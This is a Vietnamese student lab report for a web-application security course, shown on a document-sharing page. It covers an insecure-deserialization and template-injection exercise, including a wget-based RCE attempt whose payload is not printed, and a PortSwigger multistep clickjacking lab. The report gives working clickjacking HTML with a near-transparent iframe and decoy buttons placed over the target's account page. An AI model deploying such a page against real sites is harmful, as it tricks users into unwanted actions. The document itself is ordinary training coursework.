1. Trang chủ
  2. » Luận Văn - Báo Cáo

An toàn ứng dụng web và csdl báo cáo bài thực hành 2

14 1 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề An Toàn Ứng Dụng Web Và CSDL Báo Cáo Bài Thực Hành 2
Tác giả Nguyễn Kiều Tuấn Anh
Người hướng dẫn Ninh Thị Thu Trang
Trường học Học Viện Công Nghệ Bưu Chính Viễn Thông
Chuyên ngành An Toàn Thông Tin
Thể loại Báo cáo
Năm xuất bản 2024
Thành phố Hà Nội
Định dạng
Số trang 14
Dung lượng 2,22 MB

Nội dung

HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNGKHOA AN TOÀN THÔNG TIN HỌC PHẦN: AN TOÀN ỨNG DỤNG WEB VÀ CSDL BÁO CÁO BÀI THỰC HÀNH 2 Sinh viên : Nguyễn Kiều Tuấn Anh Mã sinh viên: B21DCAT034 Giả

Trang 1

HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG

KHOA AN TOÀN THÔNG TIN

HỌC PHẦN: AN TOÀN ỨNG DỤNG WEB VÀ CSDL

BÁO CÁO BÀI THỰC HÀNH 2

Sinh viên : Nguyễn Kiều Tuấn Anh

Mã sinh viên: B21DCAT034

Giảng viên: Ninh Thị Thu Trang

Hà nội, tháng 10/ 2024

Trang 2

Mục Lục

1 Khai thác lỗ hổng Insecure Deserialization 2

Lý thuyết 2

Thực hành 2

2 Clickjacking lab-multistep 10

Lý thuyết: 10

Thực hành 10

Nguồn tham khảo: 13

Trang 3

1 Khai thác lỗ hổng Insecure Deserialization

Lý thuyết

Lỗ hổng Insecure Deserialization (tạm dịch: bất an trong việc tuần tự hóa dữ liệu) là một lỗ hổng bảo mật nghiêm trọng liên quan đến việc dữ liệu bị tuần tự hóa (serialization) và giải tuần tự (deserialization) mà không được kiểm soát chặt chẽ Khi ứng dụng thực hiện việc giải tuần tự hóa dữ liệu đầu vào mà không xác minh nguồn gốc và tính hợp lệ của dữ liệu, kẻ tấn công có thể khai thác để thực thi mã độc, leo thang đặc quyền hoặc thay đổi hành vi của hệ thống

Thực hành

Ảnh 1: Bật phần mềm OWASP để quét trang web

Trang 4

Ảnh 2: Cáu hình để đặt OSWAP làm proxy

Ảnh 3: Chọn Add Exception để tiếp tục truy cập

Trang 5

Ảnh 4: Thấy một số url dẫn đến trang của admin

Ảnh 5: Trang api-docs cũng được scan thấy

Trang 6

Ảnh 6: Thử nút Try để gửi request và nhận lỗi 401 Unauthorized

Ảnh 7 : Sau khi đăng nhập ta lấy token phiên đăng nhập để dán vào request

Trang 7

Ảnh 8: Nhiệm vụ 5 sau khi dán token thì gửi request ta được response 200 OK

Ảnh 9: Thực hiện nhiệm vụ 6 nhưng nhận được trạng thái là 500

Trang 8

Ảnh 10: Ảnh thành công của nhiệm vụ 7- nhận được phản hồi 503

Ảnh 11: Đổi tên để kiểm tra xem trang web có bị lỗi template injection không

Trang 9

Ảnh 12: Nhập #{1+1} thì thấy khả năng trang web có thể bị dính injection

Trang 10

Ảnh 13: Nhiệm vụ 8 thực hiện code RCE như khi wget thì nhận lỗi 404

Ảnh 14: Ảnh check work và nộp bài

Trang 11

2 Clickjacking lab-multistep

Lý thuyết:

Clickjacking là một kiểu tấn công mà kẻ xấu lừa người dùng nhấp vào một nội dung trên một trang web giả mạo, nhưng thực tế lại nhấp vào một nút ẩn trên một trang web khác Ví dụ, khi người dùng truy cập một trang giả mạo và nhấn vào nút để nhận quà,

họ có thể vô tình thực hiện một hành động không mong muốn, như thanh toán tiền cho một tài khoản khác.Tấn công này sử dụng một trang ẩn (iframe) được đặt lên trên trang web mà người dùng thấy

Thực hành

Ta quan tâm đến đoạn code sau khi chèn vào phần body

<style>

iframe {

position: relative;

width: 500px;

height: 700px;

opacity: 0.001;

z-index: 2;

}

.firstClick, secondClick {

position: absolute;

top: 490px;

left: 50px; z-index: 1;

}

.secondClick {

top: 290px;

left: 200px;

}

</style>

<div class="firstClick">Click me first</div>

<div class="secondClick">Click me next</div>

<iframe

src="https://0a04004203b9de9782205b0a00c300f7.web-security-academy.net/my-account"></iframe>

- Thay đổi các giá trị top, left ở firstClick và secondClick để nó được chèn lên các button của trang web

- Biến opacity là để điều chỉ độ mờ của web cần che giấu đi

- Trong phần <iframe src=> điều url của lab đang thực hiện

Trang 12

Ảnh 15: Điều chỉnh sao cho firstClick nằm chính xác vào nút ẩn

Ảnh 16: Điều chỉnh code sao cho secondClick nằm đúng vị trí của nút ẩn

Trang 13

Ảnh 17: Điều chỉnh giá trị opacity để ẩn web cần giấu và chỉ hiển thị web giả mạo

Ảnh 18: Thành công giải được bài lab sau khi chọn Deliver exploit to victim

Trang 14

Nguồn tham khảo:

https://portswigger.net/web-security/clickjacking/lab-multistep

Ngày đăng: 14/02/2025, 15:36